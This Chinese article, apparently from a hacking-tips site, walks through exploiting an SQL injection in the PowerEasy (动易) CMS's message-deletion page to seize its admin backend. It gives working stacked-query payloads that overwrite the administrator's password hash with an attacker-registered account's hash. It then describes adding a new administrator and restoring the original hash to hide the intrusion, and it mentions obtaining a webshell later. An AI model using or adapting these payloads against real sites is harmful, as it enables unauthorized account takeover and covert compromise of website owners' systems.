动易SQL版新洞利用短信功能直接拿后台

所属分类: 实用技巧 / 漏洞研究 阅读数: 1812
收藏 0 赞 0 分享
先注册个号,进入控制面版给自己发条短信  

http://127.0.0.1/User/User_Message.asp?Action=Del&ManageType=Inbox&MessageID=4  
这就是点```  
用户名为admin  奇怪``抓不到```好了抓到了~~~显示记录不存在``是因为  
=没有登陆````ef0020cf8c5e45b9 密码是这个```  
下面就开始将管理员的密码更新为我注册用户的密码````  
利用动易爆库改库程序先将pe_admin里adminname,password字段爆出来.....  
);update pe_admin set password=(select userpassword from pe_user 
 where username=char(0x68)%2Bchar(0x61)%2Bchar(0x63)%2Bchar(0x6b) 
%2Bchar(0x35)%2Bchar(0x32)%2Bchar(0x30)) where id=1;--  
这语句的意思就是将PE——ADMIN表中ID=1的用户的密码更新为PE_USER表中 user的密码```好``现在来看```需要将hack520转char  
更新成功`~~~~现在已经将PE_admin表ID=1的用户的密码更新为hack520的密码````再看一下```  
53dc3b60f2d40cd4这个是我前面注册的密码```好现在登陆后台看看  
您的用户名:admin   
您的身份:超级管理员   
待阅短信: 1 条   
成功````然后为自己加个管理员`然后利用以下语句`将管理员的密码更新回来  
user  
就是注册的用户名````````时间不多```进得了后台就不管其他的先了````拿WEBSHELL以后再说```  
刚刚时间到了,现在继续。。。将管理员密码改回来.  
);declare @a sysname select @a=0x650066003000300032003000630066 
0038006300350065003400350062003900 update pe_admin set passwo 
rd=@a--  这个要转一下  

更新```把管理员密码改回来  OK我们再看看修改成功没```ef0020cf8c5e45b9这个是原来的密码吧?  
好了就到此结束! 
更多精彩内容其他人还在看

DVBBS7.0Sp2前台提权漏洞利用程序[Kendy版]源码

DVBBS7.0Sp2前台提权漏洞利用程序[Kendy版]源码
收藏 0 赞 0 分享

跨站脚本攻击+Cookies欺骗(Discuz篇)

跨站脚本攻击+Cookies欺骗(Discuz篇)
收藏 0 赞 0 分享

Dvbbs7.1.0 cookie存在泄露绝对路径漏洞

Dvbbs7.1.0 cookie存在泄露绝对路径漏洞
收藏 0 赞 0 分享

关于对SQL注入80004005 及其它错误消息分析

关于对SQL注入80004005 及其它错误消息分析
收藏 0 赞 0 分享

针对蓝牙PIN码的最新攻击技术细节分析

针对蓝牙PIN码的最新攻击技术细节分析
收藏 0 赞 0 分享

细说3721网络实名“病毒”

细说3721网络实名“病毒”
收藏 0 赞 0 分享

浅谈SQL SERVER数据库口令的脆弱性

浅谈SQL SERVER数据库口令的脆弱性
收藏 0 赞 0 分享

MSHTA漏洞为黑客大开远程控制之门(图)

MSHTA漏洞为黑客大开远程控制之门(图)
收藏 0 赞 0 分享

再探九酷网络个人主页空间管理系统

再探九酷网络个人主页空间管理系统
收藏 0 赞 0 分享

黑客突破防火墙常用的几种技术

黑客突破防火墙常用的几种技术
收藏 0 赞 0 分享
查看更多